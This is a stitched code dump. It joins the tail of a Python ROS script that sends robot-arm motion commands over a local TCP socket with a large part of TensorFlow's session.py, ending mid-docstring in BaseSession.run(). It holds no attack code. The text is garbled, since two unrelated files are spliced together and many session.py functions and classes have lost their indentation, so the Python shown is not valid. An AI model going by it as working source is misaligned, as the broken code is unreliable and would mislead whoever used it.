                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        print("ptp---------")
                        break
                break
            #-------Line Mode--------
            if case(Taskcmd.Action_Type.Line):
                for case in switch(socket_cmd.setboth):
                    if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                        break
                break
            #-------set arm speed--------
            if case(Taskcmd.Action_Type.SetVel):
                data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
                break
            #-------set arm delay time--------
            if case(Taskcmd.Action_Type.Delay):
                data = TCP.SetDelay(socket_cmd.grip,0)
                break
            #-------set arm fast/safe speed mode--------
            if case(Taskcmd.Action_Type.Mode):
                data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
                break
        socket_cmd.action= 5 ## reset to the idle/initial mode state
        Socket.send(data.encode('utf-8'))# send over the socket (str must be encoded for transport)
        # Socket_sent_flag = True
        # socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
    """Connect to the control-side PC and poll arm-state feedback forever.

    Updates the shared state_feedback object from the fixed byte positions
    of each feedback packet; exits when the strategy reports shutdown.
    """
    global Socket
    try:
        Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
        #s.connect(('192.168.1.102', 8080))#iclab computerx
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    print('Connection has been successful')
    print(Socket.recv(1024))
    while 1:
        feedback_str = Socket.recv(1024)
        # The control side reports the arm state at byte index 2
        # ('48'/'49'/'54' are the ASCII codes of '0'/'1'/'6').
        if str(feedback_str[2]) == '48':# F arm is Ready to accept the next motion command
            state_feedback.ArmState = 0
            # Arm_feedback = 0
            # socket_client_arm_state(Arm_feedback)
            #print("isbusy false")
        if str(feedback_str[2]) == '49':# T arm is busy; next motion command cannot run yet
            state_feedback.ArmState = 1
            # Arm_feedback = 1
            # socket_client_arm_state(Arm_feedback)
            #print("isbusy true")
        if str(feedback_str[2]) == '54':# 6 strategy finished
            state_feedback.ArmState = 6
            # Arm_feedback = 6
            # socket_client_arm_state(Arm_feedback)
            print("shutdown")
        # Sent-flag acknowledgement at byte index 4.
        if str(feedback_str[4]) == '48':# received 0: false
            state_feedback.SentFlag = 0
            # Socket_sent_flag = False
            # socket_client_sent_flag(Socket_sent_flag)
        if str(feedback_str[4]) == '49':# received 1: true
            state_feedback.SentFlag = 1
            # Socket_sent_flag = True
            # socket_client_sent_flag(Socket_sent_flag)
        ##---------------arm command transmission end-----------------
        if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
            break
    rospy.on_shutdown(myhook)
    Socket.close()
## multithreading
def thread_test():
    """Thread target: run the blocking socket client loop."""
    socket_client()
## multithreading end
def myhook():
    """rospy shutdown hook: announce the shutdown."""
    print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5## reset to the idle/initial mode state
    # Run the socket client in a background thread while the ROS publisher
    # loop runs in the main thread.
    t = threading.Thread(target=thread_test)
    t.start() # start the worker thread
    try:
        socket_talker()
    except rospy.ROSInterruptException:
        pass
t.join() |
session.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import re
import threading
import warnings
import numpy as np
import wrapt
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import pywrap_tf_session as tf_session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.tf_export import tf_export
# Streamz/monitoring counter bumped once per Python-created Session.
_python_session_create_counter = monitoring.Counter(
    '/tensorflow/api/python/session_create_counter',
    'Counter for number of sessions created in Python.')
class SessionInterface(object):
  """Base class for implementations of TensorFlow client sessions."""

  # Abstract interface only: every member raises NotImplementedError and is
  # overridden by concrete sessions (e.g. BaseSession).
  @property
  def graph(self):
    """The underlying TensorFlow graph, to be used in building Operations."""
    raise NotImplementedError('graph')

  @property
  def sess_str(self):
    """The TensorFlow process to which this session will connect."""
    raise NotImplementedError('sess_str')

  def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
    """Runs operations in the session. See `BaseSession.run()` for details."""
    raise NotImplementedError('run')

  def partial_run_setup(self, fetches, feeds=None):
    """Sets up the feeds and fetches for partial runs in the session."""
    raise NotImplementedError('partial_run_setup')

  def partial_run(self, handle, fetches, feed_dict=None):
    """Continues the execution with additional feeds and fetches."""
    raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
  """Rebuild an IndexedSlicesValue from its fetched component arrays.

  `fetched_vals` holds [values, indices] or [values, indices, dense_shape];
  a missing dense_shape becomes None.
  """
  values, indices = fetched_vals[0], fetched_vals[1]
  dense_shape = fetched_vals[2] if len(fetched_vals) == 3 else None
  return ops.IndexedSlicesValue(values, indices, dense_shape)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
#   fetch_fn : Type -> (list of Tensors,
#                       lambda: list of fetched np.ndarray -> TypeVal)
#   feed_fn1 : Type, TypeVal -> list of (Tensor, value)
#   feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# NOTE: entries are matched in order; the final (object, ...) entry is the
# catch-all default, so it must stay last.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
    # SparseTensors are fetched as SparseTensorValues. They can be fed
    # SparseTensorValues or normal tuples.
    (sparse_tensor.SparseTensor, lambda fetch: ([
        fetch.indices, fetch.values, fetch.dense_shape
    ], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
     lambda feed, feed_val: list(
         zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
     lambda feed: [feed.indices, feed.values, feed.dense_shape]),
    # IndexedSlices are fetched as IndexedSlicesValues. They can be fed
    # IndexedSlicesValues or normal tuples.
    (ops.IndexedSlices,
     lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
                    else [fetch.values, fetch.indices, fetch.dense_shape
                         ], _get_indexed_slices_value_from_fetches),
     _get_feeds_for_indexed_slices,
     lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
     [feed.values, feed.indices, feed.dense_shape]),
    # The default catches all other types and performs no expansions.
    (object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
     lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
    tensor_type,
    fetch_function,
    feed_function=None,
    feed_function_for_partial_run=None):
  """Register fetch and feed conversion functions for `tf.Session.run()`.

  Registers a triple of conversion functions so that values of a user-defined
  type can be fetched from and/or fed into a `tf.Session.run()` call.

  An example

  ```python
  class SquaredTensor(object):
    def __init__(self, tensor):
      self.sq = tf.square(tensor)

  # Conversion functions:
  fetch_function = lambda squared_tensor: ([squared_tensor.sq],
                                           lambda val: val[0])
  feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
  feed_function_for_partial_run = lambda feed: [feed.sq]

  # After registration the type can be used directly:
  session.run(squared_tensor1,
              feed_dict={squared_tensor2: some_numpy_array})
  ```

  Args:
    tensor_type: The type for which you want to register a conversion function.
    fetch_function: A callable taking a `tensor_type` object and returning a
      tuple of (list of `tf.Tensor`s, callable mapping a list of ndarrays back
      to a single value of the user type). It describes how to expand a fetch
      into component tensors and contract the results again.
    feed_function: A callable taking (feed_key, feed_value) and returning a
      list of (feed_tensor, feed_val) tuples; feed_key has type `tensor_type`
      and each feed_tensor is a `tf.Tensor`. It describes how a single fed
      value maps onto one or more tensors and their values.
    feed_function_for_partial_run: A callable taking a `tensor_type` object
      and returning the list of Tensors to feed when setting up a partial run.

  Raises:
    ValueError: If `tensor_type` has already been registered.
  """
  for registered_type, _, _, _ in _REGISTERED_EXPANSIONS:
    if issubclass(registered_type, tensor_type):
      raise ValueError('%s has already been registered so ignore it.' %
                       tensor_type)

  # New registrations go to the front so they win over the `object` catch-all.
  _REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
                                    feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
  """Fetch mapper for singleton tensors and ops."""

  def __init__(self, fetches, contraction_fn):
    """Creates an _ElementFetchMapper.

    This mapper handles leaves in the fetch struct. Because of the expansions
    mechanism, a single leaf can expand to several tensors. Each entry may
    also be a string (tensor or op name) or any object the graph can convert
    to a tensor (e.g. a Variable), so every fetch is resolved through
    `as_graph_element()`.

    Args:
      fetches: List of objects, as returned by a fetch_fn defined in
        _REGISTERED_EXPANSIONS.
      contraction_fn: Callable as returned by a fetch_fn.
    """
    self._unique_fetches = []
    graph = ops.get_default_graph()
    for fetch in fetches:
      try:
        self._unique_fetches.append(
            graph.as_graph_element(
                fetch, allow_tensor=True, allow_operation=True))
      except TypeError as e:
        raise TypeError('Fetch argument %r has invalid type %r, '
                        'must be a string or Tensor. (%s)' %
                        (fetch, type(fetch), str(e)))
      except (ValueError, KeyError) as e:
        # Both lookup failures surface the same way to the caller.
        raise ValueError('Fetch argument %r cannot be interpreted as a '
                         'Tensor. (%s)' % (fetch, str(e)))
    self._contraction_fn = contraction_fn

  def unique_fetches(self):
    return self._unique_fetches

  def build_results(self, values):
    # An `Operation` fetch produces no values and maps to `None`.
    if not values:
      return None
    return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = {}
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(id(f))
if j is None:
j = len(seen_fetches)
seen_fetches[id(f)] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
class _ListFetchMapper(_FetchMapper):
  """Fetch mapper for lists, tuples, and namedtuples."""

  def __init__(self, fetches):
    """Creates a _ListFetchMapper.

    Args:
      fetches: List, tuple, or namedtuple of fetches.
    """
    # Unwrap proxies so results are rebuilt with the underlying type.
    if isinstance(fetches, wrapt.ObjectProxy):
      self._fetch_type = type(fetches.__wrapped__)
    else:
      self._fetch_type = type(fetches)
    self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
    self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)

  def unique_fetches(self):
    return self._unique_fetches

  def build_results(self, values):
    # One result per element mapper, in the original order.
    results = [
        mapper.build_results([values[i] for i in indices])
        for mapper, indices in zip(self._mappers, self._value_indices)
    ]
    # Rebuild a value of the original fetch type.
    if issubclass(self._fetch_type, list):
      return results
    if self._fetch_type == tuple:
      return tuple(results)
    # Namedtuples are constructed positionally.
    return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
  """Fetch mapper for dicts."""

  def __init__(self, fetches):
    """Creates a _DictFetchMapper.

    Args:
      fetches: Dict of fetches.
    """
    self._fetch_type = type(fetches)
    # A defaultdict cannot be rebuilt from key/value pairs alone, so its
    # default_factory is carried along via functools.partial.
    if isinstance(fetches, collections.defaultdict):
      self._type_ctor = functools.partial(collections.defaultdict,
                                          fetches.default_factory)
    else:
      self._type_ctor = self._fetch_type

    self._keys = fetches.keys()
    self._mappers = [
        _FetchMapper.for_fetch(fetch) for fetch in fetches.values()
    ]
    self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)

  def unique_fetches(self):
    return self._unique_fetches

  def build_results(self, values):
    pairs = [(key, mapper.build_results([values[i] for i in indices]))
             for key, mapper, indices in zip(self._keys, self._mappers,
                                             self._value_indices)]
    return self._type_ctor(pairs)
class _AttrsFetchMapper(_FetchMapper):
  """Fetch mapper for attrs decorated classes."""

  def __init__(self, fetches):
    """Creates a _AttrsFetchMapper.

    Args:
      fetches: An instance of an attrs decorated class.
    """
    self._fetch_type = type(fetches)
    self._mappers = [
        _FetchMapper.for_fetch(field) for field in _get_attrs_values(fetches)
    ]
    self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)

  def unique_fetches(self):
    return self._unique_fetches

  def build_results(self, values):
    # Rebuild the attrs instance positionally from each field's results.
    rebuilt = [
        mapper.build_results([values[i] for i in indices])
        for mapper, indices in zip(self._mappers, self._value_indices)
    ]
    return self._fetch_type(*rebuilt)
class _FetchHandler(object):
  """Handler for structured fetches.

  Given a graph, a user-provided structure for fetches, and a feed dict, this
  class takes care of generating a list of tensor names to fetch and op names
  to run for a low level `run()` call.

  Given the results of the low level run call, this class can also rebuild a
  result structure matching the user-provided structure for fetches, but
  containing the corresponding results.
  """

  # TODO(touts): Make this class also take care of destructuring the feed
  # dict instead of doing it in the callers.

  def __init__(self, graph, fetches, feeds, feed_handles=None):
    """Creates a fetch handler.

    Args:
      graph: Graph of the fetches. Used to check for fetchability and to
        convert all fetches to tensors or ops as needed.
      fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
        or dict.
      feeds: A feed dict where keys are Tensors.
      feed_handles: A dict from feed Tensors to TensorHandle objects used as
        direct feeds.
    """
    # Resolving fetches to graph elements requires `graph` to be the default.
    with graph.as_default():
      self._fetch_mapper = _FetchMapper.for_fetch(fetches)
    self._fetches = []
    self._targets = []
    self._feeds = feeds
    self._feed_handles = feed_handles or {}
    # _ops records, per unique fetch (in order), whether it is an Operation
    # (True) or a Tensor (False); build_results() replays this ordering.
    self._ops = []
    self._fetch_handles = {}
    for fetch in self._fetch_mapper.unique_fetches():
      if isinstance(fetch, ops.Operation):
        self._assert_fetchable(graph, fetch)
        self._targets.append(fetch)
        self._ops.append(True)
      else:
        self._assert_fetchable(graph, fetch.op)
        self._fetches.append(fetch)
        self._ops.append(False)
        # Remember the fetch if it is for a tensor handle.
        if (isinstance(fetch, ops.Tensor) and
            (fetch.op.type == 'GetSessionHandle' or
             fetch.op.type == 'GetSessionHandleV2')):
          self._fetch_handles[fetch.ref()] = fetch.op.inputs[0].dtype
    # Tensors that are also fed need not be requested from the runtime; their
    # values come straight from the feed (see build_results()).
    self._final_fetches = [x for x in self._fetches if x.ref() not in feeds]

  def _assert_fetchable(self, graph, op):
    # Fail early with a clear error instead of letting the runtime reject the
    # fetch of an op marked unfetchable (e.g. one defined inside a function).
    if not graph.is_fetchable(op):
      raise errors.InaccessibleTensorError(
          'Operation %r has been marked as not fetchable. Typically this'
          ' happens when it is defined in another function or code block.'
          ' Use return values,explicit Python locals or TensorFlow collections'
          ' to access it.'
          % op.name)

  def fetches(self):
    """Return the unique names of tensors to fetch.

    Returns:
      A list of strings.
    """
    return self._final_fetches

  def targets(self):
    """Return the unique names of ops to run.

    Returns:
      A list of strings.
    """
    return self._targets

  def build_results(self, session, tensor_values):
    """Build results matching the original fetch shape.

    `tensor_values` must be a list of the same length as
    the one returned by `fetches()`, and holding the requested
    fetch values.

    This method builds a struct with the same shape as the original `fetches`
    passed to the constructor, in which the fetches are replaced by their
    fetched value.

    Args:
      session: The enclosing session.  Used for tensor handles.
      tensor_values: List of values matching the list returned by fetches().

    Returns:
      A structure of the same shape as the original `fetches` argument but
        containing tensors or None (for fetched ops).
    """
    full_values = []
    assert len(self._final_fetches) == len(tensor_values)
    # `i` indexes self._fetches (all tensor fetches); `j` indexes
    # tensor_values (only the fetches actually requested from the runtime,
    # i.e. those not satisfied by a feed).
    i = 0
    j = 0
    for is_op in self._ops:
      if is_op:
        full_values.append(None)
      else:
        # If the fetch was in the feeds, use the fed value, otherwise
        # use the returned value.
        if self._fetches[i].ref() in self._feed_handles:
          # A fetch had a corresponding direct TensorHandle feed. Call eval()
          # to obtain the Tensor value from the TensorHandle.
          value = self._feed_handles[self._fetches[i].ref()].eval()
        else:
          value = self._feeds.get(self._fetches[i].ref())
        if value is None:
          value = tensor_values[j]
          j += 1
        dtype = self._fetch_handles.get(self._fetches[i].ref())
        if dtype:
          # The fetched value is a raw tensor handle; wrap it so the caller
          # can pass it back to the session later.
          full_values.append(session_ops.TensorHandle(value, dtype, session))
        else:
          full_values.append(value)
        i += 1
    assert j == len(tensor_values)
    return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
  """Utility function for transitioning to the new session API.

  Args:
    tensor_list: a list of `Tensor`s.

  Returns:
    A list of each `Tensor`s name (as byte arrays).
  """
  names = []
  for tensor in tensor_list:
    names.append(compat.as_bytes(tensor.name))
  return names
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
  def __init__(self, target='', graph=None, config=None):
    """Constructs a new TensorFlow session.

    Args:
      target: (Optional) The TensorFlow execution engine to connect to.
      graph: (Optional) The graph to be used. If this argument is None, the
        default graph will be used.
      config: (Optional) ConfigProto proto used to configure the session. If no
        config is specified, the global default will be used. The global default
        can be configured via the tf.config APIs.

    Raises:
      tf.errors.OpError: Or one of its subclasses if an error occurs while
        creating the TensorFlow session.
      TypeError: If one of the arguments has the wrong type.
    """
    _python_session_create_counter.get_cell().increase_by(1)
    if graph is None:
      self._graph = ops.get_default_graph()
    else:
      if not isinstance(graph, ops.Graph):
        raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
      self._graph = graph

    self._closed = False

    if target is not None:
      try:
        self._target = compat.as_bytes(target)
      except TypeError:
        # Common mistake: `Session(config)` passes the config positionally
        # as `target`; detect that case and give a pointed error message.
        if isinstance(target, config_pb2.ConfigProto):
          raise TypeError('target must be a string, but got %s.'
                          ' Did you do "Session(config)" instead of'
                          ' "Session(config=config)"?' % type(target))
        raise TypeError('target must be a string, but got %s' % type(target))
    else:
      self._target = None

    self._delete_lock = threading.Lock()
    self._dead_handles = []
    if config is None:
      config = context.context().config

    if not isinstance(config, config_pb2.ConfigProto):
      raise TypeError('config must be a tf.ConfigProto, but got %s' %
                      type(config))

    if (mixed_precision_global_state.is_mixed_precision_graph_rewrite_enabled()
        and config.graph_options.rewrite_options.auto_mixed_precision !=
        rewriter_config_pb2.RewriterConfig.OFF):
      # Mixed precision is globally enabled and the caller did not explicitly
      # opt out: turn the auto_mixed_precision rewrite ON in a *copy* of the
      # config, so the caller's proto is not mutated.
      new_config = config_pb2.ConfigProto()
      new_config.CopyFrom(config)
      new_config.graph_options.rewrite_options.auto_mixed_precision = (
          rewriter_config_pb2.RewriterConfig.ON)
      config = new_config
    elif (config.graph_options.rewrite_options.auto_mixed_precision !=
          rewriter_config_pb2.RewriterConfig.ON):
      # Record globally that a session was created with the rewrite not ON.
      mixed_precision_global_state.set_non_mixed_precision_session_created(True)

    self._config = config
    self._add_shapes = config.graph_options.infer_shapes

    self._session = None
    opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
    try:
      # pylint: disable=protected-access
      self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
      # pylint: enable=protected-access
    finally:
      # The options buffer is owned by this Python object; always release it,
      # whether or not session creation succeeded.
      tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
  def __del__(self):
    # Best-effort teardown: close the session, then release the underlying
    # C session object. Nothing here may raise during interpreter shutdown.
    # cleanly ignore all exceptions
    try:
      self.close()
    except Exception:  # pylint: disable=broad-except
      pass
    if self._session is not None:
      try:
        tf_session.TF_DeleteSession(self._session)
      except (AttributeError, TypeError):
        # At shutdown, `c_api_util`, `tf_session`, or
        # `tf_session.TF_DeleteSession` may have been garbage collected, causing
        # the above method calls to fail. In this case, silently leak since the
        # program is about to terminate anyway.
        pass
      self._session = None
  @property
  def graph(self):
    """The graph that was launched in this session."""
    return self._graph

  @property
  def graph_def(self):
    """A serializable version of the underlying TensorFlow graph.

    Returns:
      A graph_pb2.GraphDef proto containing nodes for all of the Operations in
      the underlying TensorFlow graph.
    """
    return self._graph.as_graph_def(add_shapes=self._add_shapes)

  @property
  def sess_str(self):
    """The execution-engine target this session connects to (as set in
    `__init__`: bytes, or None when no target was given)."""
    return self._target
  def as_default(self):
    """Returns a context manager that makes this object the default session.

    Use with the `with` keyword to specify that calls to
    `tf.Operation.run` or `tf.Tensor.eval` should be executed in
    this session.

    ```python
    c = tf.constant(..)
    sess = tf.compat.v1.Session()

    with sess.as_default():
      assert tf.compat.v1.get_default_session() is sess
      print(c.eval())
    ```

    To get the current default session, use `tf.compat.v1.get_default_session`.

    *N.B.* The `as_default` context manager *does not* close the
    session when you exit the context, and you must close the session
    explicitly.

    ```python
    c = tf.constant(...)
    sess = tf.compat.v1.Session()
    with sess.as_default():
      print(c.eval())
    # ...
    with sess.as_default():
      print(c.eval())

    sess.close()
    ```

    Alternatively, you can use `with tf.compat.v1.Session():` to create a
    session that is automatically closed on exiting the context,
    including when an uncaught exception is raised.

    *N.B.* The default session is a property of the current thread. If you
    create a new thread, and wish to use the default session in that
    thread, you must explicitly add a `with sess.as_default():` in that
    thread's function.

    *N.B.* Entering a `with sess.as_default():` block does not affect
    the current default graph. If you are using multiple graphs, and
    `sess.graph` is different from the value of
    `tf.compat.v1.get_default_graph`, you must explicitly enter a
    `with sess.graph.as_default():` block to make `sess.graph` the default
    graph.

    Returns:
      A context manager using this session as the default session.
    """
    # The returned manager installs `self` as the thread's default session
    # for the duration of the `with` block (see `ops.default_session`).
    return ops.default_session(self)
  def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
    """Runs operations and evaluates tensors in `fetches`.

    This method runs one "step" of TensorFlow computation, by
    running the necessary graph fragment to execute every `Operation`
    and evaluate every `Tensor` in `fetches`, substituting the values in
    `feed_dict` for the corresponding input values.

    The `fetches` argument may be a single graph element, or an arbitrarily
    nested list, tuple, namedtuple, dict, or OrderedDict containing graph
    elements at its leaves.  A graph element can be one of the following types:

    * A `tf.Operation`.
      The corresponding fetched value will be `None`.
    * A `tf.Tensor`.
      The corresponding fetched value will be a numpy ndarray containing the
      value of that tensor.
    * A `tf.sparse.SparseTensor`.
      The corresponding fetched value will be a
      `tf.compat.v1.SparseTensorValue`
      containing the value of that sparse tensor.
    * A `get_tensor_handle` op.  The corresponding fetched value will be a
      numpy ndarray containing the handle of that tensor.
    * A `string` which is the name of a tensor or operation in the graph.

    The value returned by `run()` has the same shape as the `fetches` argument,
    where the leaves are replaced by the corresponding values returned by
    TensorFlow.

    Example:

    ```python
    a = tf.constant([10, 20])
    b = tf.constant([1.0, 2.0])
    # 'fetches' can be a singleton
    v = session.run(a)
    # v is the numpy array [10, 20]
    # 'fetches' can be a list.
    v = session.run([a, b])
